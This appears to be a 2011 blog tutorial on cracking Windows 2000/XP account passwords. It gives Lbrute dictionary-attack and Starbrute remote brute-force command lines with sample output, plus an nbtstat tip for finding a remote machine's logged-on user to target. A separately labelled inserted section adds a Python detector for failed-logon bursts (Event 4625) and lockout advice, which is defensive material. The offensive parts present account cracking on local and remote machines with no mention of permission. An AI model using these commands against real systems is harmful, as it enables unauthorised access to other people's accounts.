Saturday 18 June 2011

Cracking a user account locally and remotely - brute force or dictionary attack Win2K and WinXP

When you need the password of an account on your local machine or on a remote machine you can either brute force or dictionary attack the account. Remember this could take anywhere from 1 minute to a few days depending on how complex the password is.


First program we will use is LBRUTE.

Lbrute is a program which you can use to guess a user account password with a dictionary attack while logged onto the machine locally. You will need a wordlist which Lbrute can use to guess the password. Example of how to use Lbrute:

C:\password\brute\lbrute>lbrute -d -u guest -f wordlist.txt

lbrute v0.9 - Windows NT Local logon password brute forcing utility
Copyright (C) 2005-2006 Pranay Kanwar <>

[+] On TESTPC running Windows XP

[+] Counting words....77012 words.
[+] Trying 77012 words from wordlist.txt for 'guest'
[+] Done 21%.
[+] Password for user 'guest' is password555.

The password was guessed and is displayed as: password555.

-d tells Lbrute that this will be a dictionary attack

-u is the account you're trying to crack

-f is the name of the wordlist you will be using


Second program we will use is Starbrute

Starbrute can either be used to crack a user account on your own local PC or it can be used to crack a user account on a remote PC. Starbrute uses brute force to guess the password, meaning it will try combinations of the charset 1234567890abcdefghijklmnopqrstuvwxyz in random order until it hits the password.

Example of how to use Starbrute:

C:\password\StarBrute\StarBrute>starbrute guest 3 4 high

════════ Starsky32 IPC bruteforce ════════

▓ Target IP:
▓ User Account:guest
▓ Charset:1234567890abcdefghijklmnopqrstuvwxyz
▓ Start lenght:3
▓ Max lenght:4
▓ Process priority: High

■ Starting...
» Trying 3 letters lenght passwords...

Terminated. Password found: 111

The password was brute forced and is displayed as: 111.

 is the IP of the machine you're trying to get the account password from.

guest is the account name you're trying to crack

3 is the start length of the password

4 is the maximum length of the password

high means the program will use a lot of resources - the higher the priority, the faster it can guess the password


With both these programs you can specify any account on a machine - administrator, guest or whatever.
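From the other side of the wire, both of these runs leave the same footprint: a long burst of failed logons against one account, either as interactive (local) logon failures or as network logon failures from one source address. The script below is an added example, not part of the original post and not from either tool's author: it takes Windows Security log failed-logon records (Event ID 4625, reduced to the handful of fields the check needs) and raises one alert per account/source pair that accumulates a threshold of bad-password failures inside a short window. The sample records, the threshold and window values, and the function and variable names are all constructed for this example.

```python
"""Flag password guessing against Windows accounts from failed-logon events.

Added example (not part of the original post). Consumes Windows Security log
Event ID 4625 (logon failure) records, reduced to the fields the check needs,
and alerts on any (account, source) pair that accumulates THRESHOLD
bad-password failures inside WINDOW. Logon type 3 (network, the IPC$ path a
remote guessing tool uses) and logon type 2 (interactive, what a local tool
exercises) are both covered. All sample data is constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

BAD_PASSWORD = "0xC000006A"    # NTSTATUS substatus: wrong password
ACCOUNT_LOCKED = "0xC0000234"  # NTSTATUS substatus: account locked out
LOGON_TYPE_NAME = {2: "interactive (local)", 3: "network (remote)"}

WINDOW = timedelta(seconds=60)  # assumed window; tune to the lockout policy
THRESHOLD = 10                  # assumed failures-per-window before alerting


def make_burst(start, account, logon_type, source, count, every_seconds,
               status=BAD_PASSWORD):
    """Construct `count` failure records spaced `every_seconds` apart (test data)."""
    t0 = datetime.strptime(start, "%Y-%m-%d %H:%M:%S")
    return [
        {"time": t0 + timedelta(seconds=i * every_seconds), "account": account,
         "logon_type": logon_type, "source": source, "status": status}
        for i in range(count)
    ]


# Constructed sample: a remote guessing run against 'guest', a local one against
# 'administrator', and two ordinary typos from a third host that must not alert.
SAMPLE_EVENTS = (
    make_burst("2011-06-18 10:00:00", "guest", 3, "192.0.2.10", count=12, every_seconds=2)
    + make_burst("2011-06-18 10:05:00", "administrator", 2, "-", count=11, every_seconds=3)
    + make_burst("2011-06-18 10:07:00", "alice", 3, "192.0.2.20", count=2, every_seconds=20)
)


def detect_password_guessing(events, threshold=THRESHOLD, window=WINDOW):
    """Sliding-window count of bad-password failures per (account, source).

    Returns one alert per offending pair, recorded at the moment the threshold
    is first crossed. A failure carrying the locked-out status is reported on
    its own, because it means guessing continued after lockout engaged.
    """
    recent = defaultdict(deque)  # (account, source) -> timestamps inside the window
    alerts, alerted = [], set()
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["account"].lower(), ev["source"])
        if ev["status"] == ACCOUNT_LOCKED:
            if ("locked", key) not in alerted:
                alerted.add(("locked", key))
                alerts.append({"kind": "guessing past lockout", "account": key[0],
                               "source": key[1], "logon_type": ev["logon_type"],
                               "vector": LOGON_TYPE_NAME.get(ev["logon_type"], "other"),
                               "count": None, "time": ev["time"]})
            continue
        if ev["status"] != BAD_PASSWORD:
            continue
        q = recent[key]
        q.append(ev["time"])
        while ev["time"] - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and ("burst", key) not in alerted:
            alerted.add(("burst", key))
            alerts.append({"kind": "password guessing", "account": key[0],
                           "source": key[1], "logon_type": ev["logon_type"],
                           "vector": LOGON_TYPE_NAME.get(ev["logon_type"], "other"),
                           "count": len(q), "time": ev["time"]})
    return alerts


if __name__ == "__main__":
    for a in detect_password_guessing(SAMPLE_EVENTS):
        print(f"{a['time']}  {a['kind']:22s} account={a['account']:14s} "
              f"source={a['source']:12s} via {a['vector']} (failures={a['count']})")
```

The same threshold is what an account lockout policy enforces on the host: with lockout at 10 bad attempts, the 77012-word run shown for Lbrute and the 36^3 to 36^4 combinations Starbrute walks through both stall almost immediately, and the locked-out status in later 4625 events is itself a second signal worth alerting on.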

Remember you can find out what account is logged onto a machine by typing this command into CMD: nbtstat -a IP

It will show you the username currently logged on and then you can try and crack that account password.